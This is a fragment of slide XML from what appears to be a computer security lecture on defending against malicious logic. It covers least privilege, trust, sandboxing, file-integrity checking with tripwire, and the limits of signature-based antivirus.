                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="595630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Limiting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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accessibility</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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of objects should </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="0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limit spread of malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="15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logic and e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-55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f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="0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fects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of its actions (least privilege)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>40</a:t>
                      </a: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108036" y="4135373"/>
            <a:ext cx="40978" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40978" h="38100">
                <a:moveTo>
                  <a:pt x="40978" y="17243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34934" y="4949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22009" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15943" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4691" y="6925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6338" y="33150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18961" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25212" y="37840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36533" y="31176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40978" y="17243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="40978" h="38100">
                <a:moveTo>
                  <a:pt x="22009" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18961" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18961" y="130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22009" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="40978" h="38100">
                <a:moveTo>
                  <a:pt x="22009" y="38100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18961" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22009" y="3810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198691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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Reducing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Protection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Domain</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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of principle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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of least privilege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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="641985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Basic idea:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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remove rights from a process so it can only perform its function (and nothing else)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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="883920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spc="-240" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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arning:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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if that function requires it to write to some object,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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it can write </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>anything</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="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to that object.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1363345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But you can make sure it writes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>only</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="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to</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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those objects you expect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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>41</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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2267635"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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3027680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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>The</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Role</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-160" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>r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ust</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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607060" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="8000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spc="-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rust the user to take</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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explicit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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actions to limit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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their process’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-2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protection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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domain su</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-55" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f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ficiently</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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That</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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is, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="0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enforce least privilege</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="15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correctly</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="622935" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="288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spc="-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rust mechanisms to describe programs’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-22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expected actions su</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-55" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f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ficiently for descriptions to be applied, and to handle commands without such descriptions properly</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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25"/>
                        </a:spcBef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spc="-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rust specific programs and kernel</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1394460" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="288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Problem: these are usually the first programs malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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logic attack</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>42</a:t>
                      </a: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1562100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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Sandboxing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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irtual</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Machines</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1447165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Sandboxes and virtual machines</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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also restrict rights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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="853440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Consider running a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5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-240" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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eb browser inside a virtual machine.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="592455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Modify program by inserting instructions to cause traps when violation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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of policy is attempted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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="640080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Replace</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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dynamic</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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load libraries with instrumented routines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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>43</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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357120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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Detect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-120" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Alteration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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of Files</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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670560" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="270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2500" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Compute a manipulation detection code (MDC) to generate a signature block for each file, and save it (It</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="-140" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="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500" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a cryptographic hash)</a:t>
                      </a:r>
                      <a:endParaRPr sz="25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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="721360" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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2500" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Late</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="-105" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, recompute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="1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500" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>the MDC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="-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500" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>and compare to stored MDC.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="-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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>If di</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-50" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ferent, file has changed.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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255"/>
                        </a:spcBef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2500" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Example: tripwire</a:t>
                      </a:r>
                      <a:endParaRPr sz="25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10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="727710" lvl="1" indent="-286385">
                        <a:lnSpc>
                          <a:spcPts val="2810"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Signature consists of file attributes, cryptographic checksums</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2600" spc="-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600" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>c</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2600" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>hosen from among MD4, MD5, H</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2600" spc="-335" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>AV</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2600" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>AL, SHS, CRC-16, CRC-32, etc.)</a:t>
                      </a:r>
                      <a:endParaRPr sz="26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750"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="40"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="750"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1079500" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="274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2700" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Assumption</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Files do not contain malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="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500" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>logic when original signature block generated</a:t>
                      </a:r>
                      <a:endParaRPr sz="25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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>44</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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819400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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Antivirus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Programs</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1524000" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPts val="324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Look for specific sequences of bytes (called “virus signature” in file; if found, warn user and/or disinfect file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10"/>
                        </a:spcBef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Each</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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agent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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looks for known set of viruses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750"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="20"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="750"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1060450" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Signature-based</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-15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-385" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A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V</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-6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programs cannot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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deal with viruses not yet analyzed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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>45</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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014855">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Detec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t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-120" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Action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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Beyon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d </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Spec</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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535940" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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spc="-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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reat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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execution,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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infection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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as errors and apply fault tolerant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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techniques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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1699260" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Example:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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break program into sequences of nonbranching instructions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295"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Checksu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m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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eac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h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s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equence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,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encryp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t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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r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esult</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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lvl="1"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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="616585" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="3020"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Whe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n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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r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un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, 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processo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r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recompute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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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checksum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,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an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d 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at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each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branch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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co-processor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c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ompares</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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computed checksum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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with stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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one</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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290"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
